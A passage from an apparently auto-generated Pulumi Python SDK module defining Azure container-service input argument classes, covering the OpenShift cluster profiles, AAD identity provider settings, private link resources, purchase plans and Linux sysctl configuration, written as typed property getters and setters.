:param pulumi.Input[str] secret: The secret password associated with the provider.
:param pulumi.Input[str] tenant_id: The tenantId associated with the provider.
"""
pulumi.set(__self__, "kind", 'AADIdentityProvider')
if client_id is not None:
pulumi.set(__self__, "client_id", client_id)
if customer_admin_group_id is not None:
pulumi.set(__self__, "customer_admin_group_id", customer_admin_group_id)
if secret is not None:
pulumi.set(__self__, "secret", secret)
if tenant_id is not None:
pulumi.set(__self__, "tenant_id", tenant_id)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[str]:
"""
The kind of the provider.
Expected value is 'AADIdentityProvider'.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[str]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Optional[pulumi.Input[str]]:
"""
The clientId password associated with the provider.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter(name="customerAdminGroupId")
def customer_admin_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The groupId to be granted cluster admin role.
"""
return pulumi.get(self, "customer_admin_group_id")
@customer_admin_group_id.setter
def customer_admin_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "customer_admin_group_id", value)
@property
@pulumi.getter
def secret(self) -> Optional[pulumi.Input[str]]:
"""
The secret password associated with the provider.
"""
return pulumi.get(self, "secret")
@secret.setter
def secret(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secret", value)
@property
@pulumi.getter(name="tenantId")
def tenant_id(self) -> Optional[pulumi.Input[str]]:
"""
The tenantId associated with the provider.
"""
return pulumi.get(self, "tenant_id")
@tenant_id.setter
def tenant_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tenant_id", value)
@pulumi.input_type
class OpenShiftManagedClusterAgentPoolProfileArgs:
def __init__(__self__, *,
count: pulumi.Input[int],
name: pulumi.Input[str],
vm_size: pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']],
os_type: Optional[pulumi.Input[Union[str, 'OSType']]] = None,
role: Optional[pulumi.Input[Union[str, 'OpenShiftAgentPoolProfileRole']]] = None,
subnet_cidr: Optional[pulumi.Input[str]] = None):
"""
Defines the configuration of the OpenShift cluster VMs.
:param pulumi.Input[int] count: Number of agents (VMs) to host docker containers.
:param pulumi.Input[str] name: Unique name of the pool profile in the context of the subscription and resource group.
:param pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']] vm_size: Size of agent VMs.
:param pulumi.Input[Union[str, 'OSType']] os_type: OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
:param pulumi.Input[Union[str, 'OpenShiftAgentPoolProfileRole']] role: Define the role of the AgentPoolProfile.
:param pulumi.Input[str] subnet_cidr: Subnet CIDR for the peering.
"""
pulumi.set(__self__, "count", count)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "vm_size", vm_size)
if os_type is not None:
pulumi.set(__self__, "os_type", os_type)
if role is not None:
pulumi.set(__self__, "role", role)
if subnet_cidr is None:
subnet_cidr = '10.0.0.0/24'
if subnet_cidr is not None:
pulumi.set(__self__, "subnet_cidr", subnet_cidr)
@property
@pulumi.getter
def count(self) -> pulumi.Input[int]:
"""
Number of agents (VMs) to host docker containers.
"""
return pulumi.get(self, "count")
@count.setter
def count(self, value: pulumi.Input[int]):
pulumi.set(self, "count", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Unique name of the pool profile in the context of the subscription and resource group.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']]:
"""
Size of agent VMs.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter(name="osType")
def os_type(self) -> Optional[pulumi.Input[Union[str, 'OSType']]]:
"""
OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
"""
return pulumi.get(self, "os_type")
@os_type.setter
def os_type(self, value: Optional[pulumi.Input[Union[str, 'OSType']]]):
pulumi.set(self, "os_type", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[Union[str, 'OpenShiftAgentPoolProfileRole']]]:
"""
Define the role of the AgentPoolProfile.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[Union[str, 'OpenShiftAgentPoolProfileRole']]]):
pulumi.set(self, "role", value)
@property
@pulumi.getter(name="subnetCidr")
def subnet_cidr(self) -> Optional[pulumi.Input[str]]:
"""
Subnet CIDR for the peering.
"""
return pulumi.get(self, "subnet_cidr")
@subnet_cidr.setter
def subnet_cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_cidr", value)
@pulumi.input_type
class OpenShiftManagedClusterAuthProfileArgs:
def __init__(__self__, *,
identity_providers: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterIdentityProviderArgs']]]] = None):
"""
Defines all possible authentication profiles for the OpenShift cluster.
:param pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterIdentityProviderArgs']]] identity_providers: Type of authentication profile to use.
"""
if identity_providers is not None:
pulumi.set(__self__, "identity_providers", identity_providers)
@property
@pulumi.getter(name="identityProviders")
def identity_providers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterIdentityProviderArgs']]]]:
"""
Type of authentication profile to use.
"""
return pulumi.get(self, "identity_providers")
@identity_providers.setter
def identity_providers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['OpenShiftManagedClusterIdentityProviderArgs']]]]):
pulumi.set(self, "identity_providers", value)
@pulumi.input_type
class OpenShiftManagedClusterIdentityProviderArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
provider: Optional[pulumi.Input['OpenShiftManagedClusterAADIdentityProviderArgs']] = None):
"""
Defines the configuration of the identity providers to be used in the OpenShift cluster.
:param pulumi.Input[str] name: Name of the provider.
:param pulumi.Input['OpenShiftManagedClusterAADIdentityProviderArgs'] provider: Configuration of the provider.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if provider is not None:
pulumi.set(__self__, "provider", provider)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the provider.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def provider(self) -> Optional[pulumi.Input['OpenShiftManagedClusterAADIdentityProviderArgs']]:
"""
Configuration of the provider.
"""
return pulumi.get(self, "provider")
@provider.setter
def provider(self, value: Optional[pulumi.Input['OpenShiftManagedClusterAADIdentityProviderArgs']]):
pulumi.set(self, "provider", value)
@pulumi.input_type
class OpenShiftManagedClusterMasterPoolProfileArgs:
def __init__(__self__, *,
count: pulumi.Input[int],
vm_size: pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']],
name: Optional[pulumi.Input[str]] = None,
os_type: Optional[pulumi.Input[Union[str, 'OSType']]] = None,
subnet_cidr: Optional[pulumi.Input[str]] = None):
"""
OpenShiftManagedClusterMaterPoolProfile contains configuration for OpenShift master VMs.
:param pulumi.Input[int] count: Number of masters (VMs) to host docker containers. The default value is 3.
:param pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']] vm_size: Size of agent VMs.
:param pulumi.Input[str] name: Unique name of the master pool profile in the context of the subscription and resource group.
:param pulumi.Input[Union[str, 'OSType']] os_type: OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
:param pulumi.Input[str] subnet_cidr: Subnet CIDR for the peering.
"""
pulumi.set(__self__, "count", count)
pulumi.set(__self__, "vm_size", vm_size)
if name is not None:
pulumi.set(__self__, "name", name)
if os_type is not None:
pulumi.set(__self__, "os_type", os_type)
if subnet_cidr is not None:
pulumi.set(__self__, "subnet_cidr", subnet_cidr)
@property
@pulumi.getter
def count(self) -> pulumi.Input[int]:
"""
Number of masters (VMs) to host docker containers. The default value is 3.
"""
return pulumi.get(self, "count")
@count.setter
def count(self, value: pulumi.Input[int]):
pulumi.set(self, "count", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']]:
"""
Size of agent VMs.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[Union[str, 'OpenShiftContainerServiceVMSize']]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Unique name of the master pool profile in the context of the subscription and resource group.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="osType")
def os_type(self) -> Optional[pulumi.Input[Union[str, 'OSType']]]:
"""
OsType to be used to specify os type. Choose from Linux and Windows. Default to Linux.
"""
return pulumi.get(self, "os_type")
@os_type.setter
def os_type(self, value: Optional[pulumi.Input[Union[str, 'OSType']]]):
pulumi.set(self, "os_type", value)
@property
@pulumi.getter(name="subnetCidr")
def subnet_cidr(self) -> Optional[pulumi.Input[str]]:
"""
Subnet CIDR for the peering.
"""
return pulumi.get(self, "subnet_cidr")
@subnet_cidr.setter
def subnet_cidr(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_cidr", value)
@pulumi.input_type
class OpenShiftRouterProfileArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None):
"""
Represents an OpenShift router
:param pulumi.Input[str] name: Name of the router profile.
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the router profile.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class PrivateEndpointArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None):
"""
Private endpoint which a connection belongs to.
:param pulumi.Input[str] id: The resource Id for private endpoint
"""
if id is not None:
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The resource Id for private endpoint
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@pulumi.input_type
class PrivateLinkResourceArgs:
def __init__(__self__, *,
group_id: Optional[pulumi.Input[str]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
required_members: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
A private link resource
:param pulumi.Input[str] group_id: The group ID of the resource.
:param pulumi.Input[str] id: The ID of the private link resource.
:param pulumi.Input[str] name: The name of the private link resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] required_members: RequiredMembers of the resource
:param pulumi.Input[str] type: The resource type.
"""
if group_id is not None:
pulumi.set(__self__, "group_id", group_id)
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if required_members is not None:
pulumi.set(__self__, "required_members", required_members)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="groupId")
def group_id(self) -> Optional[pulumi.Input[str]]:
"""
The group ID of the resource.
"""
return pulumi.get(self, "group_id")
@group_id.setter
def group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group_id", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the private link resource.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the private link resource.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="requiredMembers")
def required_members(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
RequiredMembers of the resource
"""
return pulumi.get(self, "required_members")
@required_members.setter
def required_members(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "required_members", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The resource type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class PrivateLinkServiceConnectionStateArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[Union[str, 'ConnectionStatus']]] = None):
"""
The state of a private link service connection.
:param pulumi.Input[str] description: The private link service connection description.
:param pulumi.Input[Union[str, 'ConnectionStatus']] status: The private link service connection status.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if status is not None:
pulumi.set(__self__, "status", status)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The private link service connection description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[Union[str, 'ConnectionStatus']]]:
"""
The private link service connection status.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[Union[str, 'ConnectionStatus']]]):
pulumi.set(self, "status", value)
@pulumi.input_type
class PurchasePlanArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
product: Optional[pulumi.Input[str]] = None,
promotion_code: Optional[pulumi.Input[str]] = None,
publisher: Optional[pulumi.Input[str]] = None):
"""
Used for establishing the purchase context of any 3rd Party artifact through MarketPlace.
:param pulumi.Input[str] name: The plan ID.
:param pulumi.Input[str] product: Specifies the product of the image from the marketplace. This is the same value as Offer under the imageReference element.
:param pulumi.Input[str] promotion_code: The promotion code.
:param pulumi.Input[str] publisher: The plan ID.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if product is not None:
pulumi.set(__self__, "product", product)
if promotion_code is not None:
pulumi.set(__self__, "promotion_code", promotion_code)
if publisher is not None:
pulumi.set(__self__, "publisher", publisher)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The plan ID.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def product(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the product of the image from the marketplace. This is the same value as Offer under the imageReference element.
"""
return pulumi.get(self, "product")
@product.setter
def product(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "product", value)
@property
@pulumi.getter(name="promotionCode")
def promotion_code(self) -> Optional[pulumi.Input[str]]:
"""
The promotion code.
"""
return pulumi.get(self, "promotion_code")
@promotion_code.setter
def promotion_code(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "promotion_code", value)
@property
@pulumi.getter
def publisher(self) -> Optional[pulumi.Input[str]]:
"""
The plan ID.
"""
return pulumi.get(self, "publisher")
@publisher.setter
def publisher(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "publisher", value)
@pulumi.input_type
class ResourceReferenceArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None):
"""
A reference to an Azure resource.
:param pulumi.Input[str] id: The fully qualified Azure resource id.
"""
if id is not None:
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The fully qualified Azure resource id.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@pulumi.input_type
class SysctlConfigArgs:
def __init__(__self__, *,
fs_aio_max_nr: Optional[pulumi.Input[int]] = None,
fs_file_max: Optional[pulumi.Input[int]] = None,
fs_inotify_max_user_watches: Optional[pulumi.Input[int]] = None,
fs_nr_open: Optional[pulumi.Input[int]] = None,
kernel_threads_max: Optional[pulumi.Input[int]] = None,
net_core_netdev_max_backlog: Optional[pulumi.Input[int]] = None,
net_core_optmem_max: Optional[pulumi.Input[int]] = None,
net_core_rmem_default: Optional[pulumi.Input[int]] = None,
net_core_rmem_max: Optional[pulumi.Input[int]] = None,
net_core_somaxconn: Optional[pulumi.Input[int]] = None,
net_core_wmem_default: Optional[pulumi.Input[int]] = None,
net_core_wmem_max: Optional[pulumi.Input[int]] = None,
net_ipv4_ip_local_port_range: Optional[pulumi.Input[str]] = None,
net_ipv4_neigh_default_gc_thresh1: Optional[pulumi.Input[int]] = None,
net_ipv4_neigh_default_gc_thresh2: Optional[pulumi.Input[int]] = None,
net_ipv4_neigh_default_gc_thresh3: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_fin_timeout: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_keepalive_probes: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_keepalive_time: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_max_syn_backlog: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_max_tw_buckets: Optional[pulumi.Input[int]] = None,
net_ipv4_tcp_tw_reuse: Optional[pulumi.Input[bool]] = None,
net_ipv4_tcpkeepalive_intvl: Optional[pulumi.Input[int]] = None,
net_netfilter_nf_conntrack_buckets: Optional[pulumi.Input[int]] = None,
net_netfilter_nf_conntrack_max: Optional[pulumi.Input[int]] = None,
vm_max_map_count: Optional[pulumi.Input[int]] = None,
vm_swappiness: Optional[pulumi.Input[int]] = None,
vm_vfs_cache_pressure: Optional[pulumi.Input[int]] = None):
"""
Sysctl settings for Linux agent nodes.
:param pulumi.Input[int] fs_aio_max_nr: Sysctl setting fs.aio-max-nr.
:param pulumi.Input[int] fs_file_max: Sysctl setting fs.file-max.
:param pulumi.Input[int] fs_inotify_max_user_watches: Sysctl setting fs.inotify.max_user_watches.
:param pulumi.Input[int] fs_nr_open: Sysctl setting fs.nr_open.
:param pulumi.Input[int] kernel_threads_max: Sysctl setting kernel.threads-max.
:param pulumi.Input[int] net_core_netdev_max_backlog: Sysctl setting net.core.netdev_max_backlog.
:param pulumi.Input[int] net_core_optmem_max: Sysctl setting net.core.optmem_max.
:param pulumi.Input[int] net_core_rmem_default: Sysctl setting net.core.rmem_default.
:param pulumi.Input[int] net_core_rmem_max: Sysctl setting net.core.rmem_max.
:param pulumi.Input[int] net_core_somaxconn: Sysctl setting net.core.somaxconn.
:param pulumi.Input[int] net_core_wmem_default: Sysctl setting net.core.wmem_default.
:param pulumi.Input[int] net_core_wmem_max: Sysctl setting net.core.wmem_max.
:param pulumi.Input[str] net_ipv4_ip_local_port_range: Sysctl setting net.ipv4.ip_local_port_range.
:param pulumi.Input[int] net_ipv4_neigh_default_gc_thresh1: Sysctl setting net.ipv4.neigh.default.gc_thresh1.
:param pulumi.Input[int] net_ipv4_neigh_default_gc_thresh2: Sysctl setting net.ipv4.neigh.default.gc_thresh2.
:param pulumi.Input[int] net_ipv4_neigh_default_gc_thresh3: Sysctl setting net.ipv4.neigh.default.gc_thresh3.
:param pulumi.Input[int] net_ipv4_tcp_fin_timeout: Sysctl setting net.ipv4.tcp_fin_timeout.
:param pulumi.Input[int] net_ipv4_tcp_keepalive_probes: Sysctl setting net.ipv4.tcp_keepalive_probes.
:param pulumi.Input[int] net_ipv4_tcp_keepalive_time: Sysctl setting net.ipv4.tcp_keepalive_time.
:param pulumi.Input[int] net_ipv4_tcp_max_syn_backlog: Sysctl setting net.ipv4.tcp_max_syn_backlog.
:param pulumi.Input[int] net_ipv4_tcp_max_tw_buckets: Sysctl setting net.ipv4.tcp_max_tw_buckets.
:param pulumi.Input[bool] net_ipv4_tcp_tw_reuse: Sysctl setting net.ipv4.tcp_tw_reuse.
:param pulumi.Input[int] net_ipv4_tcpkeepalive_intvl: Sysctl setting net.ipv4.tcp_keepalive_intvl.
:param pulumi.Input[int] net_netfilter_nf_conntrack_buckets: Sysctl setting net.netfilter.nf_conntrack_buckets.
:param pulumi.Input[int] net_netfilter_nf_conntrack_max: Sysctl setting net.netfilter.nf_conntrack_max.
:param pulumi.Input[int] vm_max_map_count: Sysctl setting vm.max_map_count.
:param pulumi.Input[int] vm_swappiness: Sysctl setting vm.swappiness.
:param pulumi.Input[int] vm_vfs_cache_pressure: Sysctl setting vm.vfs_cache_pressure.
"""
if fs_aio_max_nr is not None:
pulumi.set(__self__, "fs_aio_max_nr", fs_aio_max_nr)
if fs_file_max is not None:
pulumi.set(__self__, "fs_file_max", fs_file_max)
if fs_inotify_max_user_watches is not None:
pulumi.set(__self__, "fs_inotify_max_user_watches", fs_inotify_max_user_watches)
if fs_nr_open is not None:
pulumi.set(__self__, "fs_nr_open", fs_nr_open)
if kernel_threads_max is not None:
pulumi.set(__self__, "kernel_threads_max", kernel_threads_max)
if net_core_netdev_max_backlog is not None:
pulumi.set(__self__, "net_core_netdev_max_backlog", net_core_netdev_max_backlog)
if net_core_optmem_max is not None:
pulumi.set(__self__, "net_core_optmem_max", net_core_optmem_max)
if net_core_rmem_default is not None:
pulumi.set(__self__, "net_core_rmem_default", net_core_rmem_default)
if net_core_rmem_max is not None:
pulumi.set(__self__, "net_core_rmem_max", net_core_rmem_max)
if net_core_somaxconn is not None:
pulumi.set(__self__, "net_core_somaxconn", net_core_somaxconn)
if net_core_wmem_default is not None:
pulumi.set(__self__, "net_core_wmem_default", net_core_wmem_default)
if net_core_wmem_max is not None:
pulumi.set(__self__, "net_core_wmem_max", net_core_wmem_max)
if net_ipv4_ip_local_port_range is not None:
pulumi.set(__self__, "net_ipv4_ip_local_port_range", net_ipv4_ip_local_port_range)
if net_ipv4_neigh_default_gc_thresh1 is not None:
pulumi.set(__self__, "net_ipv4_neigh_default_gc_thresh1", net_ipv4_neigh_default_gc_thresh1)
if net_ipv4_neigh_default_gc_thresh2 is not None:
pulumi.set(__self__, "net_ipv4_neigh_default_gc_thresh2", net_ipv4_neigh_default_gc_thresh2)
if net_ipv4_neigh_default_gc_thresh3 is not None:
pulumi.set(__self__, "net_ipv4_neigh_default_gc_thresh3", net_ipv4_neigh_default_gc_thresh3)
if net_ipv4_tcp_fin_timeout is not None:
pulumi.set(__self__, "net_ipv4_tcp_fin_timeout", net_ipv4_tcp_fin_timeout)
if net_ipv4_tcp_keepalive_probes is not None:
pulumi.set(__self__, "net_ipv4_tcp_keepalive_probes", net_ipv4_tcp_keepalive_probes)
if net_ipv4_tcp_keepalive_time is not None:
pulumi.set(__self__, "net_ipv4_tcp_keepalive_time", net_ipv4_tcp_keepalive_time)
if net_ipv4_tcp_max_syn_backlog is not None:
pulumi.set(__self__, "net_ipv4_tcp_max_syn_backlog", net_ipv4_tcp_max_syn_backlog)
if net_ipv4_tcp_max_tw_buckets is not None:
pulumi.set(__self__, "net_ipv4_tcp_max_tw_buckets", net_ipv4_tcp_max_tw_buckets)
if net_ipv4_tcp_tw_reuse is not None:
pulumi.set(__self__, "net_ipv4_tcp_tw_reuse", net_ipv4_tcp_tw_reuse)
if net_ipv4_tcpkeepalive_intvl is not None:
pulumi.set(__self__, "net_ipv4_tcpkeepalive_intvl", net_ipv4_tcpkeepalive_intvl)
if net_netfilter_nf_conntrack_buckets is not None:
pulumi.set(__self__, "net_netfilter_nf_conntrack_buckets", net_netfilter_nf_conntrack_buckets)
if net_netfilter_nf_conntrack_max is not None:
pulumi.set(__self__, "net_netfilter_nf_conntrack_max", net_netfilter_nf_conntrack_max)
if vm_max_map_count is not None:
pulumi.set(__self__, "vm_max_map_count", vm_max_map_count)
if vm_swappiness is not None:
pulumi.set(__self__, "vm_swappiness", vm_swappiness)
if vm_vfs_cache_pressure is not None:
pulumi.set(__self__, "vm_vfs_cache_pressure", vm_vfs_cache_pressure)
@property
@pulumi.getter(name="fsAioMaxNr")
def fs_aio_max_nr(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting fs.aio-max-nr.
"""
return pulumi.get(self, "fs_aio_max_nr")
@fs_aio_max_nr.setter
def fs_aio_max_nr(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fs_aio_max_nr", value)
@property
@pulumi.getter(name="fsFileMax")
def fs_file_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting fs.file-max.
"""
return pulumi.get(self, "fs_file_max")
@fs_file_max.setter
def fs_file_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fs_file_max", value)
@property
@pulumi.getter(name="fsInotifyMaxUserWatches")
def fs_inotify_max_user_watches(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting fs.inotify.max_user_watches.
"""
return pulumi.get(self, "fs_inotify_max_user_watches")
@fs_inotify_max_user_watches.setter
def fs_inotify_max_user_watches(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fs_inotify_max_user_watches", value)
@property
@pulumi.getter(name="fsNrOpen")
def fs_nr_open(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting fs.nr_open.
"""
return pulumi.get(self, "fs_nr_open")
@fs_nr_open.setter
def fs_nr_open(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fs_nr_open", value)
@property
@pulumi.getter(name="kernelThreadsMax")
def kernel_threads_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting kernel.threads-max.
"""
return pulumi.get(self, "kernel_threads_max")
@kernel_threads_max.setter
def kernel_threads_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "kernel_threads_max", value)
@property
@pulumi.getter(name="netCoreNetdevMaxBacklog")
def net_core_netdev_max_backlog(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.netdev_max_backlog.
"""
return pulumi.get(self, "net_core_netdev_max_backlog")
@net_core_netdev_max_backlog.setter
def net_core_netdev_max_backlog(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_netdev_max_backlog", value)
@property
@pulumi.getter(name="netCoreOptmemMax")
def net_core_optmem_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.optmem_max.
"""
return pulumi.get(self, "net_core_optmem_max")
@net_core_optmem_max.setter
def net_core_optmem_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_optmem_max", value)
@property
@pulumi.getter(name="netCoreRmemDefault")
def net_core_rmem_default(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.rmem_default.
"""
return pulumi.get(self, "net_core_rmem_default")
@net_core_rmem_default.setter
def net_core_rmem_default(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_rmem_default", value)
@property
@pulumi.getter(name="netCoreRmemMax")
def net_core_rmem_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.rmem_max.
"""
return pulumi.get(self, "net_core_rmem_max")
@net_core_rmem_max.setter
def net_core_rmem_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_rmem_max", value)
@property
@pulumi.getter(name="netCoreSomaxconn")
def net_core_somaxconn(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.somaxconn.
"""
return pulumi.get(self, "net_core_somaxconn")
@net_core_somaxconn.setter
def net_core_somaxconn(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_somaxconn", value)
@property
@pulumi.getter(name="netCoreWmemDefault")
def net_core_wmem_default(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.wmem_default.
"""
return pulumi.get(self, "net_core_wmem_default")
@net_core_wmem_default.setter
def net_core_wmem_default(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_wmem_default", value)
@property
@pulumi.getter(name="netCoreWmemMax")
def net_core_wmem_max(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.core.wmem_max.
"""
return pulumi.get(self, "net_core_wmem_max")
@net_core_wmem_max.setter
def net_core_wmem_max(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_core_wmem_max", value)
@property
@pulumi.getter(name="netIpv4IpLocalPortRange")
def net_ipv4_ip_local_port_range(self) -> Optional[pulumi.Input[str]]:
"""
Sysctl setting net.ipv4.ip_local_port_range.
"""
return pulumi.get(self, "net_ipv4_ip_local_port_range")
@net_ipv4_ip_local_port_range.setter
def net_ipv4_ip_local_port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "net_ipv4_ip_local_port_range", value)
@property
@pulumi.getter(name="netIpv4NeighDefaultGcThresh1")
def net_ipv4_neigh_default_gc_thresh1(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.neigh.default.gc_thresh1.
"""
return pulumi.get(self, "net_ipv4_neigh_default_gc_thresh1")
@net_ipv4_neigh_default_gc_thresh1.setter
def net_ipv4_neigh_default_gc_thresh1(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_neigh_default_gc_thresh1", value)
@property
@pulumi.getter(name="netIpv4NeighDefaultGcThresh2")
def net_ipv4_neigh_default_gc_thresh2(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.neigh.default.gc_thresh2.
"""
return pulumi.get(self, "net_ipv4_neigh_default_gc_thresh2")
@net_ipv4_neigh_default_gc_thresh2.setter
def net_ipv4_neigh_default_gc_thresh2(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "net_ipv4_neigh_default_gc_thresh2", value)
@property
@pulumi.getter(name="netIpv4NeighDefaultGcThresh3")
def net_ipv4_neigh_default_gc_thresh3(self) -> Optional[pulumi.Input[int]]:
"""
Sysctl setting net.ipv4.neigh.default.gc_thresh3.
"""
return pulumi.get(self, "net_ipv4_neigh_default_gc_thresh3")
